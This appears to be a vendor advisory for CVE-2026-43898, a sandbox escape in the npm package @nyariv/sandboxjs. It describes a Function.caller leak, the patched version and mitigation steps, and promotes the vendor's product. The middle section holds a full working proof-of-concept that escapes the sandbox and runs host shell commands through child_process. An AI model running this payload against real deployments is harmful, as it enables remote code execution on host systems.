CVE-2026-43898 is a critical-severity (CVSS 10) Code Injection vulnerability in @nyariv/sandboxjs. A fix is available for @nyariv/sandboxjs — see the affected versions and patch details below.
SandboxJS: Sandbox escape via Function.caller leakage of internal call op
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
- A successful exploit gives an attacker total control of the affected component, not partial access.
Exploitation and automatability from CISA’s SSVC triage for CVE-2026-43898.
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
How urgent is this, really
CVE-2026-43898 plotted by exploitation likelihood (EPSS) against impact (CVSS). The shaded corner — EPSS 50%+ and CVSS 7.0+ — is where this CVE doesn't sit, though severity or exploitability alone can still warrant action.
Where this sits among everything scored
Of 378,567 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Real counts from FIRST.org, not a sample — log-scaled since the landscape is heavily right-skewed.
Real-World Exposure
How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.
@nyariv/sandboxjsnpmDescription
Summary
Sandbox-defined functions expose Function.caller, allowing sandboxed code to recover the internal LispType.Call runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript.
Details
The vulnerability is in the property access logic registered via addOps in prop.ts. Sandboxed code could access the caller, callee, and arguments properties on functions. In the CommonJS build, this allowed sandboxed code to read Function.caller and leak a privileged internal LispType.Call callback.
In executorUtils.ts createFunction() constructs normal host JS functions, and because these are ordinary host functions, sandbox code can observe:
function f(){ return f.caller }
That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal LispType.Call op, which is registered in call.ts. The escape was possible because the LispType.Call handler accepts a params object from the attacker and uses its fields without authenticating that they came from the executor. if you looked at those branches call.ts:47, call.ts:70, call.ts:149. This means the attacker controls obj.context, obj.prop, obj.get, context.evals.get and a. This can lead to direct invocation of an internal primitive with forged operands
PoC
const sandb = require('@nyariv/sandboxjs').default;
const sand = new sandb();
const payload = `
const callOp = (function fn() { return fn.caller; })();
function makeContext(capture = () => {}) {
return { ctx: { options: 0 }, evals: { get: capture } };
}
function leakStatic(obj, prop) {
let leaked;
callOp({
done() {},
a() {},
b: [],
obj: { context: obj, prop, get() {} },
context: makeContext((fn) => (leaked = fn, () => 1))
});
return leaked;
}
function callDirect(fn, args) {
let value;
callOp({
done(_, result) { value = result; },
a() {},
b: args,
obj: fn,
context: makeContext()
});
return value;
}
callDirect(leakStatic(Object, 'defineProperty'), [
leakStatic,
'call',
callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [
callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]),
'constructor'
])
]);
let hostFn;
callOp({
done(_, result) { hostFn = result; },
a: leakStatic,
b: [],
obj: {
context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()',
get() {}
},
context: makeContext()
});
return hostFn();
`;
console.log(sand.compile(payload)().run());
Impact
Sandbox escape leads to RCE
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | @nyariv/sandboxjs | all versions | 0.9.6npm install @nyariv/sandboxjs@0.9.6 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @nyariv/sandboxjs, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update @nyariv/sandboxjs to 0.9.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-43898 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 Security's impact-aware SCA analyses which vulnerable code paths your application actually calls, so a match like CVE-2026-43898 can be triaged on real exposure rather than presence alone.
Tailored to CVE-2026-43898. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is CVE-2026-43898 in your dependencies?
O3 Security finds CVE-2026-43898 across npm dependencies, including transitive ones, and its impact-aware SCA ranks findings by whether your code actually calls the vulnerable path.